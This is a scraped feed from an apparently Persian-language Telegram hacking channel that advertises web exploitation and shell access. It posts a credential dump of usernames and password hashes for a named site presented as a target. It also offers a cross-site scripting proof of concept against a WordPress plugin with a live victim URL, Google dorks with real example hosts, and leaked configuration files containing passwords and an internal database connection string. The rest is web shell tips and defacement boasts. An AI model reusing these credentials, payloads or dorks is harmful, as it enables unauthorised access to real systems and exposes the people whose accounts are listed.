0Day.Today | Learn Exploit | Zero World | Dark web |
19K subscribers
1.23K photos
125 videos
489 files
1.28K links
☝️Iп Tнε Nαмε Oғ GOD☝️

Web Exploiting
& Server Hacking
Shell & Admin panel Access

priv8 Google hacking Dorks
new vul & bugs discovering & Tut


❗️0 day is today❗️

تبلیغات : @LearnExploitAds

IR0Day.Today
Download Telegram
#Target ::: #User ::: #Pass
Target :
http://echate.com
User & Pass :
به اولی بچسبید فقط :()
super : MK8E01.is1JiE
maribel : OW9EhroEd2LH6
pedro : JksZgw6Igh5n2
Lorito : IJ.YCMDuGoafs
Maxwell : 6YcH/ygaJxtK.
Andragot : RiKt6Wd0/3MNc
AM1 : YPmws3iJOGL7.
chacalve : iOYVcPPXQP0ao
andragot : jZcdvKhmpLUt2
jaws : 7jRACQJZ737gM
cvl : TkpIKA3ejAFhE
Luis : c/DNKnQLv4XZM
frank : n2V3D6t6iapJo
Alter : 32Targyi0ui7w
Yeray : D6//gdvLOiaBc
Rataragua : AmuXD.v3aoimA
tazvw : jhs/JL4JAJInw
vmss : ki6OGKXVLTAfM
lanenita : GpFcTrhyRc1PY
ladilla : ecJBOGDHTqWcI
mollejuo : YjhSCjK22g7lE
Carlos : VNF1l2.qe/KW6
davidh : 45ndEcmbfRBfA
PEDRO : nkoWcJ69.VDZ.
TETE : wbPHnAu58p2I.
Vilma : Tw7LS3lzgJhTA
mariano1 : SnZrCxc4g9Z8w
Genserico : OVZb1KEO0fnLo
ALE : PvbMOLAm2KiW6
POLLO : a5D8OujiP4hes
tigre : EBlSJz4fKkIHM
46718295 : 1UQzgA4.AvOrM
jack : 98ZSnztE.8Vhc
VALLAIS : UzJPreClU98yo
Cigarron : Y6mT2MlxEJ4mQ
tavo : ehw1Hc/hyDx5A
cleopatra : RSTwwKpSeZu.M
fgt : xLBobjZeNgbyo
Romina00 : HHmaF2lGjOtJw
romina00 : D3OzVkSj.R3xk
coyote : WGWu0HxIsIMaI
YONDAM : 23McSYgW.93mQ
CHABORRIS : Vg4VGw5GThBY6
ghprlab : KOxRx20NwN/FI
4058427 : H7nZ6Xe7QHbAc
ralph : TALsiJRFAiC6I
evto : .N/jbUKNER2Nc
nini : Zi58PRrye4RTM
bichito : 6L25snOe7ALrI
5314026 : S3dEMhyD/gUmk
BELISIMA : DmkmlV8r2bNXs
elcoco : V.WddauLyW57M
wiledward : NIn9Y6ANg8VkY
Heralci : nvXhAKUTuzOus
rmlr : sHGegXn.an9Z6
Lejana : BulZkQb/l3tsE
Fotolatina : ELD2spsPMXbJo
TIMIDO : YGx973Rwdp9tA
JESS : 7wJ.7lTdcvsj2
ur4no : Du1bVh5ZRcJL.
heartbreaker : 9zdSKk2vlwuL.
LUiSENRi : xMg7Po3L08DHg
joseb : HAwYP9sm6PsFI
vergadura : Pz4scDItQ2bCY
Ictius2002 : njb38fRMNJalk
Gustavo : KWdIxLgyl3OvA
sweeteddy : bqdTv1rN14vhU
adriana : LdJgFALQC3cPQ
tikko : D7l69HE7J3t/6
jose : XQWtAC1xlxQFM
ayu : mf0kdvG2WMUqc
helen : Kcl/SXr82CA3o
wizard : HWG4Krr9vmo6I
ChamoFashion : 1BfI4/gJrz8nA
josgrevar : 4.5JIjiardnTU
pelos : iHC2ghCzpOVOY
milena : QJ0iTo12XR1Is
viagra : Q3Lc9eo2gFSNI
grabaset : 2Ci3cAeIUaGn.
25713371 : /pBl/o.6yc64E
luisalfredo : fxpLDYf7.eDR.
gollo : BKX1fKAn8lgiw
joseline : 7QDIHvppa2tVM
14371180 : uLkwOjiARgZ7U
orh : TcjTX3mLQb5Cw
valenmdp : mpDdQMBUs0nAk
bestia : lbU5GDB7jMUZw
flaca : uY6UZMiaiGaP6
Yolanda : Xq/vRqjzw07V6
123 : mRIXOK30JEaGo
16922819 : po4hE7WB/pZh6
jones793 : RTEFItryyG9EQ
david : tXf8MZVLPUi/s
pool : Hzrm7TwoIO5As
andrea74 : CybuijmyKhvzQ
ggg : jumhBj1h1kXs6
chamary : A3wckW3E1j8YA
Zeth : ldV8RR67vMck2
denise : SrxBiT45xjabY
dimuz01 : Gskp1po9kXUH.
robert : 91ZylG8ESxtDs
crow : USRPoqSaKsVlQ
cargov : 03ebT634cgCSA
dragon : m7li8ZcsfHPm.
patostefan : O2Xg6Hx6gnYiI
pety : k9eJ.4pB5eP5s
mimosa : ES6YC58l/5Dqc
Fadman : cpzzIL3yVEXoU
hmoir : W5l78qGqhp8dA
bethy : G8bcB3FKU3qA.
elplebello : MlP1ZHzfJraNc
karigeisse : 4/Nybyo0zAdt2
01082 : 7YiUiIXGLtswI
lisza27 : Ntya9vWS6Q2b.
aztiray2 : 6KrJPY3kwvYyU
aztiray3 : gu.qCissrkxB6
kastuo2983 : ZpIazzJMcGx3w
javier2983 : rBE.1VbqMeWWc
dvrvzq : WhaU/GWzmezbg
cracket13 : CHjuKwtqh1T/6
oscarskater9 : fZbFdCjX6Ev5I
ferrar : 3LhvutezNcD56
espiral : tiXlQLXCNqkjU
1212121212 : NIGfhNcVdGaRQ
sensesfail : iuMbjrzvP5zKo
7265 : hV4f/fgx1L7PI
100002147483 : Dyk0urVRAvC6o
inuyasha : AXBL0j2y731/I
pleon : De8lvYNHArnuU
1030079 : 4gnloHEibuZLk
lynx : KYK.2P.MXPFyE
Victoria : j4LRH4oHyhcvE
sailman : 5QJRohiBff84M
arg8004 : amQhZiLmR7u3c
57013308 : 6JFdHyJ2Z4djU
5520723564 : 7BS8kbTvAHviI
Joaquin : pK3dGFNTeTdgg
llobak : Kck3iUTgOhMZE
EdSoNpErU : nQTfWqrLUF4Yw
vicente27 : EHwajvE4WvXic
vicente25 : wmxwS.fkpHMZY
sehoma : iaWBsQWomY/tk
Zgirl : PM76.VYS4h9RQ
nako : oDQgPJTC4LDM2
ivancues : U3iFsQH81qhBU
ivan : KtSpquickPoDw
juanqarloz : HijAbpX/1DMYI
mojon : Karzd6Oc9dz5I

دوستان چون بقیه چرت و پرت بودن پاک شد !
================
@LearnExploit
1
#Decode - #Sh3ll - #Shell - #PHP
اموزش نحوه ی دیکد شل ها یا ویروس ها...
[+]———0Day.Boys—————[+]
اکثر بد افزار های PHP اعم از شل ها، تروجان و ...، معمولا به صورت رمزگذاری شده استفاده میشود.
مثلا شما زمانی که یک ویروس یا فایل مخرب PHP را پیدا میکنید، ممکن است با چنین چیزی مواجه شوید.

<?php eval(gzinflate(str_rot13(base64_decode('vUl6QttV ........... EP58V')))); ?>

برای این که بتوانیم فایل مخرب را رمز گشایی کنیم، می بایست تابع eval را با تابع print جایگزین کنیم تا کدهای اصلی برنامه به جای این که اجرا شود، فقط نمایش داده شود. سپس فایل را اجرا میکنیم و خروجی را مشاهده میکنیم که سورس اصلی برنامه خواهد بود.
اما همیشه مسئله به این سادگی نیست. گاهی اوقات رمز گشایی یک ویروس بسیار دشوار و زمان بر می باشد. مثلا ممکن است از فراخوانی های recursive تابع eval استفاده شده باشد. ضمن این که به جای تابع eval از چند تابع دیگر نیز می توان استفاده کرد.


[+] در این مطلب قصد دارم دو روش ساده برای رمز گشایی چنین فایل هایی را معرفی کنم :

1) اول سایت
http://www.unphp.net/
می باشد که به طور موثری این گونه فایل ها را رمز گشایی میکند و همچنین یک نمودار به شما تحویل می دهد که چگونگی رمز نگاری فایل را در قالب الگوریتم مشخص میکند.

مثال: این لینک را ببینید:
http://www.unphp.net/decode/989784f552ed894f67b7691487375a37/

———————————————-
2) ابزار دوم، این سایت است
http://ddecode.com/phpdecoder/
که امکان رمز گشایی php و فایل های hex را دارا می باشد. مثال های زیادی هم در صفحه ی اصلی سایت وجود دارد.

نمونه:
http://ddecode.com/phpdecoder/?results=989784f552ed894f67b7691487375a37
[+]———0Day.Boys—————[+]
T.me/LearnExploit
#Set #Password on the #WEB #Shell
اموزش قرار دادن پسورد روی شل
دوستان لطف کنن تست کنن اگر شد که هیچ ولی اگر نشد روش دوم رو رکورد کنیم.
دانلود لینک :
yon.ir/yiVJ7
ID : @IrDefacer
——
@LearnExploit
Forwarded from اتچ بات
#Set #Password on the #WEB #Shell
اموزش قرار دادن پسورد روی شل روش دوم
dl link : yon.ir/SVrUW
——————————
T.me/LearnExploit
#DeFaced By #X0P4SH4
[+] X0P4SH4 - UZIHACKER - EVILBOY - T.H.C TEAM - R4DIKALL [+]
https://mirror-h.org/zone/1698680/

@LearnExploit
#DeFaced By #X0P4SH4
[+] X0P4SH4 - UZIHACKER - EVILBOY - T.H.C TEAM - R4DIKALL [+]
https://mirror-h.org/zone/1698684/

@LearnExploit
#DeFaced By #X0P4SH4
[+] X0P4SH4 - UZIHACKER - EVILBOY - T.H.C TEAM - R4DIKALL [+]
https://mirror-h.org/zone/1698678/

@LearnExploit
#`Exploit Title` : Wordpress Plugins flipbox Cross Site Scripting (XSS)
/————start :
#`Google Dork` : inurl:/wp-content/plugins/flipbox


#`Description` :
این اسیب پذیری در بخش view.php سایت میباشید و هرچیزی که بعد از view.php بیاید برای شما در سایت نمایش میدهد.

#`Poc` :
با روش زیر اکسپلویت رو انجام بدید :
view.php?pdf=<html><h1>Hacked by X0P4SH4</h1>

#`Example` :
https://www.rendezvous-carnetdevoyage.com/wp-content/plugins/flipbox/view.php?pdf=%3Chtml%3E%3Ch1%3EHacked%20by%20X0P4SH4%3C/h1%3E
———————
T.mE/LeaRNEXploIT
#Dork - #Find #PHPINFO
======================
Dork :
intext:"PHP Version " ext:php intext:"disabled" intext:"Build Date" intext:"System" intext:"allow_url_fopen"
——
Example :
http://veconlab.econ.virginia.edu/phpinfo.php
======================
@LearnExploit
Forwarded from اتچ بات
#Dork - #Find #Publice #Servers
/————-/
[+]Dork:
intext:"Build dashboard" intext:"Project" intext:"Plan" intext:"Build"
—————
[+]Info:
با این دورک شما میتونید سرور های پابلیک مثل dashboard رو پیدا کنید.
همچنین این دورک به شما کمک میکند که فایل های مهمی مانند Log.txt هم دسترسی داشته باشید.
————-
[+]Example:
https://messir.uni.lu/bamboo/deploy/viewDeploymentResult.action?deploymentResultId=46170129
/—————/
T.me/LearnExploit
:::: #AppConfig - #Github - #GitLab ::::
——————————————————
<?xml version="1.0" encoding="utf-8"?>
<configuration>
<startup>
<supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" />
</startup>
<appSettings>
<add key="URL" value="https://hclo365.sharepoint.com/sites/Academy/ING" />
<add key="AcademyConfig" value="AcademyConfig" />
<add key="AcademyMember" value="ING Visitors" />
<add key="UserName" value="Sudipta_b@hcl.com" />
<add key="EncryptKey" value="123"/>
<add key="Password" value="fWSqCZ2WdCbDBbY9gSPuadIY3pPhgzfCQGRQwZUdeZU=" />
<add key="ClientSettingsProvider.ServiceUri" value="" />
</appSettings>
<system.web>
<membership defaultProvider="ClientAuthenticationMembershipProvider">
<providers>
<add name="ClientAuthenticationMembershipProvider" type="System.Web.ClientServices.Providers.ClientFormsAuthenticationMembershipProvider, System.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" serviceUri="" />
</providers>
</membership>
<roleManager defaultProvider="ClientRoleProvider" enabled="true">
<providers>
<add name="ClientRoleProvider" type="System.Web.ClientServices.Providers.ClientRoleProvider, System.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" serviceUri="" cacheTimeout="86400" />
</providers>
</roleManager>
</system.web>
</configuration>
——————————————
فک نکنم دیگه نیاز به توضیح باشه...
=== > @LearnExploit
:::: #AppConfig - #Github - #GitLab ::::
------------------
Fiti.app -[
<?xml version="1.0" encoding="utf-8" ?>
<configuration>
<connectionStrings>
<add name="AutoScoutDB" providerName="System.Data.SqlClient"
connectionString="user id=marc;password=marc;server=10.176.129.40;Integrated Security=no;database=eCommerce;connection timeout=30" />
</connectionStrings>
</configuration>
]-
===========
t.me/learnexploit
سایت hackertest.net
یک سایت هست برای تست توانایی هکر ها دارای 20 مرحله هستش
هر روز 3 مرحله رو با هم میریم
@soheileast
==========
Channel = @LearnExploit